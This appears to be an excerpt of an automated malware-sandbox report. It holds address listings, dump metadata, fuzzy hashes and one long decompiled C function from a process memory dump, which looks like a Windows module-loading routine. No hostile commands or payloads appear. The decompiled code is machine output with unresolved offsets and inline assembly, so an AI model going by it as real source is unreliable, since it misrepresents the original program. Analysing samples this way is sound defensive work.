0x00fd2238
0x00fd2240
0x00fd2242
0x00fd2244
0x010159fc
0x00fd218c
0x00fd218c
0x00000000
0x00fd218c
0x00fd224a
0x00fd224f
0x00fd2256
0x00fd2304
0x00fd2309
0x00fd230f
0x00fd231e
0x00fd231e
0x00fd231e
0x00fd2320
0x00fd2325
0x00fd232a
0x00fd232c
0x00fd233e
0x00fd233e
0x00000000
0x00fd232c
0x00fd2311
0x00fd2317
0x00fd231a
0x00fd231c
0x00fd2380
0x00fd2380
0x00fd2380
0x00fd2384
0x00000000
0x00000000
0x00fd2386
0x00000000
0x00fd231c
0x00fd225c
0x00fd225c
0x00000000
0x00fd225c
0x00fd212a
0x00fd2134
0x00fd2138
0x00fd213d
0x01015858
0x01015863
0x01015863
0x01015867
0x0101586a
0x00000000
0x00000000
0x0101586c
0x0101586c
0x01015871
0x01015875
0x01015877
0x01015997
0x0101599c
0x010159a1
0x010159a7
0x010159a7
0x00000000
0x010159a7
0x0101587d
0x00000000
0x0101588b
0x0101588b
0x01015890
0x01015892
0x01015894
0x01015899
0x0101589b
0x010158a0
0x010158a0
0x010158aa
0x010158b2
0x010158b6
0x010158be
0x010158c6
0x010158c9
0x0101590d
0x01015917
0x0101591a
0x0101591c
0x01015920
0x01015928
0x0101592a
0x0101592c
0x0101592e
0x0101592e
0x010158cb
0x010158cd
0x010158d8
0x010158e0
0x010158f4
0x010158fe
0x010158fe
0x0101593a
0x0101593e
0x01015940
0x01015942
0x00000000
0x01015944
0x01015944
0x01015949
0x0101594e
0x0101594e
0x01015953
0x0101595b
0x01015976
0x01015976
0x0101597a
0x0101597f
0x00000000
0x00000000
0x00000000
0x00000000
0x01015981
0x01015981
0x01015981
0x01015983
0x01015988
0x0101598d
0x01015991
0x01015991
0x00000000
0x0101595d
0x0101595d
0x01015963
0x01015965
0x00000000
0x00000000
0x00000000
0x00000000
0x01015967
0x01015967
0x0101596b
0x0101596d
0x00000000
0x00000000
0x0101596f
0x01015971
0x01015971
0x01015974
0x00000000
0x00000000
0x00000000
0x01015974
0x00000000
0x01015967
0x0101595b
0x01015942
0x01015863
0x00fd2143
0x00fd2143
0x00fd2149
0x00fd214f
0x00fd22f1
0x00fd22f6
0x00000000
0x00fd2173
0x00fd2173
0x00fd217d
0x00fd2181
0x00fd2186
0x010159ae
0x010159b2
0x010159b5
0x010159b7
0x010159ba
0x010159cd
0x010159d1
0x010159d5
0x010159d9
0x010159db
0x00000000
0x00000000
0x010159dd
0x010159dd
0x010159e1
0x010159e4
0x010159e7
0x010159ee
0x010159ee
0x010159f3
0x010159f3
0x00000000
0x00fd2186
0x00fd214f
0x00fd2106
0x00fd2266
0x00fd20d8
0x00fd20da
0x00fd20e0
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 334f0a89cf16c8adb20fc7befeb5719b00b52a95fd06ca1b54e4efd7efa47faa
Instruction ID: 4589d76b3e6db098b771ba5a645be40f6ec82a665b06edf2c52aba9eb826ff1f
Opcode Fuzzy Hash: 334f0a89cf16c8adb20fc7befeb5719b00b52a95fd06ca1b54e4efd7efa47faa
Instruction Fuzzy Hash: EAF11432A083419FE7A5CF28C84076A77E2AFD6324F18855EF8959B345D739D840EBD2

Uniqueness

Uniqueness Score: -1.00%

Function 00FBD5E0, Relevance: .4, Instructions: 353
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E00FBD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x109d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E00FB6600(0x10952d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x1097b9c; // 0x0
							_t281 = L00FC4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E00FEF3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x1097b90; // 0x77df0000
								if(_t384 == 0) {
									_t353 =  *0x1097b8c; // 0xb42b18
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E00FC2280(_t200, 0x10984d8);
									_t277 =  *0x10985f4; // 0xb43008
									_t351 =  *0x10985f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0xb42fa0
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E00FBFFB0(_t287, _t353, 0x10984d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E00FFCC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E00FB6600(0x10952d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E00FB7926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x109b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E0102E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x1098472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														asm("ror edi, cl");
														 *0x109b1e0( &_v192, _t353, _v168, 0, _v180);
														 *( *0x109b218 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E00FC2280(_t250, 0x10984d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L00FE3898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E00FBFFB0(_t293, _t353, 0x10984d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E00FE37F5(_t353, 0);
																}
																E00FE0413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E00FD9B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E00FD02D6(_t174);
																}
																L00FC77F0( *0x1097b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E00FDC277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L00FBEC7F(_t353);
										L00FD19B8(_t287, 0, _t353, 0);
										_t200 = E00FAF4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0 || ( *0x109b2f8 |  *0x109b2fc) == 0 || ( *0x109b2e4 & 0x00000001) != 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E00FEB640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_v200 = 0;
									if(( *0x109b2ec >> 0x00000008 & 0x00000003) == 3) {
										_t355 = _v168;
										_t342 =  &_v208;
										_t208 = E01056B68(_v168,  &_v208, _v168, __eflags);
										__eflags = _t208 - 1;
										if(_t208 == 1) {
											goto L46;
										} else {
											__eflags = _v208 & 0x00000010;
											if((_v208 & 0x00000010) == 0) {
												goto L46;
											} else {
												_t342 = 4;
												_t366 = E01056AEB(_t355, 4,  &_v216);
												__eflags = _t366;
												if(_t366 >= 0) {
													goto L46;
												} else {
													asm("int 0x29");
													_t356 = 0;
													_v44 = 0;
													_t290 = _v52;
													__eflags = 0;
													if(0 == 0) {
														L108:
														_t356 = 0;
														_v44 = 0;
														goto L63;
													} else {
														__eflags = 0;
														if(0 < 0) {
															goto L108;
														}
														L63:
														_v112 = _t356;
														__eflags = _t356;
														if(_t356 == 0) {
															L143:
															_v8 = 0xfffffffe;
															_t211 = 0xc0000089;
														} else {
															_v36 = 0;
															_v60 = 0;
															_v48 = 0;
															_v68 = 0;
															_v44 = _t290 & 0xfffffffc;
															E00FBE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
															_t306 = _v68;
															__eflags = _t306;
															if(_t306 == 0) {
																_t216 = 0xc000007b;
																_v36 = 0xc000007b;
																_t307 = _v60;
															} else {
																__eflags = _t290 & 0x00000001;
																if(__eflags == 0) {
																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																	__eflags = _t349 - 0x10b;
																	if(_t349 != 0x10b) {
																		__eflags = _t349 - 0x20b;
																		if(_t349 == 0x20b) {
																			goto L102;
																		} else {
																			_t307 = 0;
																			_v48 = 0;
																			_t216 = 0xc000007b;
																			_v36 = 0xc000007b;
																			goto L71;
																		}
																	} else {
																		L102:
																		_t307 =  *(_t306 + 0x50);
																		goto L69;
																	}
																	goto L151;
																} else {
																	_t239 = L00FBEAEA(_t290, _t290, _t356, _t366, __eflags);
																	_t307 = _t239;
																	_v60 = _t307;
																	_v48 = _t307;
																	__eflags = _t307;
																	if(_t307 != 0) {
																		L70:
																		_t216 = _v36;
																	} else {
																		_push(_t239);
																		_push(0x14);
																		_push( &_v144);
																		_push(3);
																		_push(_v44);
																		_push(0xffffffff);
																		_t319 = E00FE9730();
																		_v36 = _t319;
																		__eflags = _t319;
																		if(_t319 < 0) {
																			_t216 = 0xc000001f;
																			_v36 = 0xc000001f;
																			_t307 = _v60;
																		} else {
																			_t307 = _v132;
																			L69:
																			_v48 = _t307;
																			goto L70;
																		}
																	}
																}
															}
															L71:
															_v72 = _t307;
															_v84 = _t216;
															__eflags = _t216 - 0xc000007b;
															if(_t216 == 0xc000007b) {
																L150:
																_v8 = 0xfffffffe;
																_t211 = 0xc000007b;
															} else {
																_t344 = _t290 & 0xfffffffc;
																_v76 = _t344;
																__eflags = _v40 - _t344;
																if(_v40 <= _t344) {
																	goto L150;
																} else {
																	__eflags = _t307;
																	if(_t307 == 0) {
																		L75:
																		_t217 = 0;
																		_v104 = 0;
																		__eflags = _t366;
																		if(_t366 != 0) {
																			__eflags = _t290 & 0x00000001;
																			if((_t290 & 0x00000001) != 0) {
																				_t217 = 1;
																				_v104 = 1;
																			}
																			_t290 = _v44;
																			_v52 = _t290;
																		}
																		__eflags = _t217 - 1;
																		if(_t217 != 1) {
																			_t369 = 0;
																			_t218 = _v40;
																			goto L91;
																		} else {
																			_v64 = 0;
																			E00FBE9C0(1, _t290, 0, 0,  &_v64);
																			_t309 = _v64;
																			_v108 = _t309;
																			__eflags = _t309;
																			if(_t309 == 0) {
																				goto L143;
																			} else {
																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																				__eflags = _t226 - 0x10b;
																				if(_t226 != 0x10b) {
																					__eflags = _t226 - 0x20b;
																					if(_t226 != 0x20b) {
																						goto L143;
																					} else {
																						_t371 =  *(_t309 + 0x98);
																						goto L83;
																					}
																				} else {
																					_t371 =  *(_t309 + 0x88);
																					L83:
																					__eflags = _t371;
																					if(_t371 != 0) {
																						_v80 = _t371 - _t356 + _t290;
																						_t310 = _v64;
																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																						_t292 =  *(_t310 + 6) & 0x0000ffff;
																						_t311 = 0;
																						__eflags = 0;
																						while(1) {
																							_v120 = _t311;
																							_v116 = _t348;
																							__eflags = _t311 - _t292;
																							if(_t311 >= _t292) {
																								goto L143;
																							}
																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
																							__eflags = _t371 - _t359;
																							if(_t371 < _t359) {
																								L98:
																								_t348 = _t348 + 0x28;
																								_t311 = _t311 + 1;
																								continue;
																							} else {
																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																									goto L98;
																								} else {
																									__eflags = _t348;
																									if(_t348 == 0) {
																										goto L143;
																									} else {
																										_t218 = _v40;
																										_t312 =  *_t218;
																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																											_v100 = _t359;
																											_t360 = _v108;
																											_t372 = L00FB8F44(_v108, _t312);
																											__eflags = _t372;
																											if(_t372 == 0) {
																												goto L143;
																											} else {
																												_t290 = _v52;
																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E00FE3C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																												_t307 = _v72;
																												_t344 = _v76;
																												_t218 = _v40;
																												goto L91;
																											}
																										} else {
																											_t290 = _v52;
																											_t307 = _v72;
																											_t344 = _v76;
																											_t369 = _v80;
																											L91:
																											_t358 = _a4;
																											__eflags = _t358;
																											if(_t358 == 0) {
																												L95:
																												_t308 = _a8;
																												__eflags = _t308;
																												if(_t308 != 0) {
																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
																												}
																												_v8 = 0xfffffffe;
																												_t211 = _v84;
																											} else {
																												_t370 =  *_t218 - _t369 + _t290;
																												 *_t358 = _t370;
																												__eflags = _t370 - _t344;
																												if(_t370 <= _t344) {
																													L149:
																													 *_t358 = 0;
																													goto L150;
																												} else {
																													__eflags = _t307;
																													if(_t307 == 0) {
																														goto L95;
																													} else {
																														__eflags = _t370 - _t344 + _t307;
																														if(_t370 >= _t344 + _t307) {
																															goto L149;
																														} else {
																															goto L95;
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																							goto L97;
																						}
																					}
																					goto L143;
																				}
																			}
																		}
																	} else {
																		__eflags = _v40 - _t307 + _t344;
																		if(_v40 >= _t307 + _t344) {
																			goto L150;
																		} else {
																			goto L75;
																		}
																	}
																}
															}
														}
														L97:
														 *[fs:0x0] = _v20;
														return _t211;
													}
												}
											}
										}
									} else {
										goto L46;
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}

0x00fbd5f2
0x00fbd5f5
0x00fbd5f5
0x00fbd5fd
0x00fbd600
0x00fbd60a
0x00fbd60d
0x00fbd617
0x00fbd61d
0x00fbd627
0x00fbd62e
0x00fbd911
0x00fbd913
0x00000000
0x00fbd919
0x00fbd919
0x00fbd919
0x00fbd634
0x00fbd634
0x00fbd634
0x00fbd634
0x00fbd640
0x00fbd8bf
0x00000000
0x00fbd646
0x00fbd646
0x00fbd64d
0x00fbd652
0x0100b2fc
0x0100b2fc
0x0100b302
0x0100b33b
0x0100b341
0x00000000
0x0100b304
0x0100b304
0x0100b319
0x0100b31e
0x0100b324
0x0100b326
0x0100b332
0x0100b347
0x0100b34c
0x0100b351
0x0100b35a
0x00000000
0x0100b328
0x0100b328
0x00000000
0x0100b328
0x0100b326
0x00fbd658
0x00fbd658
0x00fbd65b
0x00fbd665
0x00000000
0x00fbd66b
0x00fbd66b
0x00fbd66b
0x00fbd66b
0x00fbd66d
0x00fbd672
0x00fbd67a
0x00000000
0x00000000
0x00fbd680
0x00fbd686
0x00fbd8ce
0x00fbd8d4
0x00fbd8dd
0x00fbd8e0
0x00fbd68c
0x00fbd691
0x00fbd69d
0x00fbd6a2
0x00fbd6a7
0x00fbd6b0
0x00fbd6b5
0x00fbd6e0
0x00fbd6b7
0x00fbd6b7
0x00fbd6b9
0x00fbd6b9
0x00fbd6bb
0x00fbd6bd
0x00fbd6ce
0x00fbd6d0
0x00fbd6d2
0x0100b363
0x0100b365
0x00000000
0x0100b36b
0x00000000
0x0100b36b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00fbd6bf
0x00fbd6bf
0x00fbd6e5
0x00fbd6e7
0x00fbd6e9
0x00fbd6ec
0x00fbd6ec
0x00fbd6ef
0x00fbd6f5
0x00fbd6f9
0x00fbd6fb
0x00fbd6fd
0x00fbd701
0x00fbd703
0x00fbd70a
0x00fbd70a
0x00fbd701
0x00fbd710
0x00fbd710
0x00fbd6c1
0x00fbd6c1
0x00fbd6c6
0x0100b36d
0x0100b36f
0x00000000
0x0100b375
0x0100b375
0x0100b375
0x00000000
0x0100b375
0x00000000
0x00fbd6cc
0x00fbd6d8
0x00fbd6d8
0x00fbd6d8
0x00000000
0x00fbd6c6
0x00fbd6bf
0x00000000
0x00fbd6da
0x00fbd6da
0x00fbd716
0x00fbd71b
0x00fbd720
0x00fbd726
0x00fbd726
0x00fbd72d
0x00000000
0x00fbd733
0x00fbd739
0x00fbd742
0x00fbd750
0x00fbd758
0x00fbd764
0x00fbd776
0x00fbd77a
0x00fbd783
0x00fbd928
0x00fbd92c
0x00fbd93d
0x00fbd944
0x00fbd94f
0x00fbd954
0x00fbd956
0x00fbd95f
0x00fbd961
0x00fbd973
0x00fbd973
0x00fbd956
0x00fbd944
0x00fbd92c
0x00fbd78b
0x0100b394
0x00fbd791
0x00fbd798
0x0100b3a3
0x0100b3bb
0x0100b3bb
0x00fbd7a5
0x00fbd866
0x00fbd870
0x00fbd892
0x00fbd898
0x00fbd89e
0x00fbd8a0
0x00fbd8a6
0x00fbd8ac
0x00fbd8ae
0x00fbd8b4
0x00fbd8b4
0x00fbd8ae
0x00fbd7a5
0x00fbd78b
0x00fbd7b1
0x0100b3c5
0x0100b3c5
0x00fbd7c3
0x00fbd7ca
0x00fbd7e5
0x00fbd7eb
0x00fbd8eb
0x00fbd8ed
0x00000000
0x00fbd8f3
0x00fbd8f3
0x00fbd8f3
0x00000000
0x00fbd8ed
0x00fbd7cc
0x00fbd7cc
0x00fbd7d2
0x00000000
0x00fbd7d4
0x00fbd7d4
0x00fbd7d7
0x00fbd7df
0x0100b3d4
0x0100b3d9
0x0100b3dc
0x0100b3dc
0x0100b3df
0x0100b3e2
0x0100b468
0x0100b46d
0x0100b46f
0x0100b46f
0x0100b475
0x00fbd8f8
0x00fbd8f9
0x00fbd8fd
0x0100b3e8
0x0100b3e8
0x0100b3eb
0x0100b3ed
0x00000000
0x0100b3ef
0x0100b3ef
0x0100b3f1
0x0100b3f4
0x0100b3fe
0x0100b404
0x0100b409
0x0100b40e
0x0100b410
0x0100b410
0x0100b414
0x0100b414
0x0100b41b
0x0100b420
0x0100b423
0x0100b425
0x0100b427
0x0100b42a
0x0100b42d
0x0100b42d
0x0100b42a
0x0100b432
0x0100b436
0x0100b438
0x0100b43b
0x0100b43b
0x0100b449
0x0100b44e
0x0100b454
0x0100b458
0x0100b458
0x0100b45d
0x00000000
0x0100b45d
0x0100b3ed
0x00000000
0x00000000
0x00000000
0x00fbd7df
0x00fbd7d2
0x00fbd7ca
0x0100b37c
0x0100b37e
0x0100b385
0x0100b38a
0x00000000
0x0100b38a
0x00fbd742
0x00fbd7f1
0x00fbd7f8
0x0100b49b
0x0100b49b
0x00fbd800
0x00fbd837
0x00fbd843
0x00fbd845
0x00fbd847
0x00fbd84a
0x00fbd84b
0x00fbd84e
0x00fbd857
0x00fbd818
0x00fbd824
0x00fbd831
0x0100b4a5
0x0100b4ab
0x0100b4b3
0x0100b4b8
0x0100b4bb
0x00000000
0x0100b4c1
0x0100b4c1
0x0100b4c8
0x00000000
0x0100b4ce
0x0100b4d4
0x0100b4e1
0x0100b4e3
0x0100b4e5
0x00000000
0x0100b4eb
0x0100b4f0
0x0100b4f2
0x00fbdac9
0x00fbdacc
0x00fbdacf
0x00fbdad1
0x00fbdd78
0x00fbdd78
0x00fbdcf2
0x00000000
0x00fbdad7
0x00fbdad9
0x00fbdadb
0x00000000
0x00000000
0x00fbdae1
0x00fbdae1
0x00fbdae4
0x00fbdae6
0x0100b4f9
0x0100b4f9
0x0100b500
0x00fbdaec
0x00fbdaec
0x00fbdaf5
0x00fbdaf8
0x00fbdafb
0x00fbdb03
0x00fbdb11
0x00fbdb16
0x00fbdb19
0x00fbdb1b
0x0100b52c
0x0100b531
0x0100b534
0x00fbdb21
0x00fbdb21
0x00fbdb24
0x00fbdcd9
0x00fbdce2
0x00fbdce5
0x00fbdd6a
0x00fbdd6d
0x00000000
0x00fbdd73
0x0100b51a
0x0100b51c
0x0100b51f
0x0100b524
0x00000000
0x0100b524
0x00fbdce7
0x00fbdce7
0x00fbdce7
0x00000000
0x00fbdce7
0x00000000
0x00fbdb2a
0x00fbdb2c
0x00fbdb31
0x00fbdb33
0x00fbdb36
0x00fbdb39
0x00fbdb3b
0x00fbdb66
0x00fbdb66
0x00fbdb3d
0x00fbdb3d
0x00fbdb3e
0x00fbdb46
0x00fbdb47
0x00fbdb49
0x00fbdb4c
0x00fbdb53
0x00fbdb55
0x00fbdb58
0x00fbdb5a
0x0100b50a
0x0100b50f
0x0100b512
0x00fbdb60
0x00fbdb60
0x00fbdb63
0x00fbdb63
0x00000000
0x00fbdb63
0x00fbdb5a
0x00fbdb3b
0x00fbdb24
0x00fbdb69
0x00fbdb69
0x00fbdb6c
0x00fbdb6f
0x00fbdb74
0x0100b557
0x0100b557
0x0100b55e
0x00fbdb7a
0x00fbdb7c
0x00fbdb7f
0x00fbdb82
0x00fbdb85
0x00000000
0x00fbdb8b
0x00fbdb8b
0x00fbdb8d
0x00fbdb9b
0x00fbdb9b
0x00fbdb9d
0x00fbdba0
0x00fbdba2
0x00fbdba4
0x00fbdba7
0x00fbdba9
0x00fbdbae
0x00fbdbae
0x00fbdbb1
0x00fbdbb4
0x00fbdbb4
0x00fbdbb7
0x00fbdbba
0x00fbdcd2
0x00fbdcd4
0x00000000
0x00fbdbc0
0x00fbdbc0
0x00fbdbd2
0x00fbdbd7
0x00fbdbda
0x00fbdbdd
0x00fbdbdf
0x00000000
0x00fbdbe5
0x00fbdbe5
0x00fbdbee
0x00fbdbf1
0x0100b541
0x0100b544
0x00000000
0x0100b546
0x0100b546
0x00000000
0x0100b546
0x00fbdbf7
0x00fbdbf7
0x00fbdbfd
0x00fbdbfd
0x00fbdbff
0x00fbdc0b
0x00fbdc15
0x00fbdc1b
0x00fbdc1d
0x00fbdc21
0x00fbdc21
0x00fbdc23
0x00fbdc23
0x00fbdc26
0x00fbdc29
0x00fbdc2b
0x00000000
0x00000000
0x00fbdc31
0x00fbdc34
0x00fbdc36
0x00fbdcbf
0x00fbdcbf
0x00fbdcc2
0x00000000
0x00fbdc3c
0x00fbdc41
0x00fbdc43
0x00000000
0x00fbdc45
0x00fbdc45
0x00fbdc47
0x00000000
0x00fbdc4d
0x00fbdc4d
0x00fbdc50
0x00fbdc52
0x00fbdc55
0x00fbdcfa
0x00fbdcfe
0x00fbdd08
0x00fbdd0a
0x00fbdd0c
0x00000000
0x00fbdd12
0x00fbdd15
0x00fbdd2d
0x00fbdd2f
0x00fbdd32
0x00fbdd35
0x00000000
0x00fbdd35
0x00fbdc5b
0x00fbdc5b
0x00fbdc5e
0x00fbdc61
0x00fbdc64
0x00fbdc67
0x00fbdc67
0x00fbdc6a
0x00fbdc6c
0x00fbdc8e
0x00fbdc8e
0x00fbdc91
0x00fbdc93
0x00fbdcce
0x00fbdcce
0x00fbdc95
0x00fbdc9c
0x00fbdc6e
0x00fbdc72
0x00fbdc75
0x00fbdc77
0x00fbdc79
0x0100b551
0x0100b551
0x00000000
0x00fbdc7f
0x00fbdc7f
0x00fbdc81
0x00000000
0x00fbdc83
0x00fbdc86
0x00fbdc88
0x00000000
0x00000000
0x00000000
0x00000000
0x00fbdc88
0x00fbdc81
0x00fbdc79
0x00fbdc6c
0x00fbdc55
0x00fbdc47
0x00fbdc43
0x00000000
0x00fbdc36
0x00fbdc23
0x00000000
0x00fbdbff
0x00fbdbf1
0x00fbdbdf
0x00fbdb8f
0x00fbdb92
0x00fbdb95
0x00000000
0x00000000
0x00000000
0x00000000
0x00fbdb95
0x00fbdb8d
0x00fbdb85
0x00fbdb74
0x00fbdc9f
0x00fbdca2
0x00fbdcb0
0x00fbdcb0
0x00fbdad1
0x0100b4e5
0x0100b4c8
0x00000000
0x00000000
0x00000000
0x00fbd831
0x00000000
0x00fbd800
0x0100b47f
0x0100b485
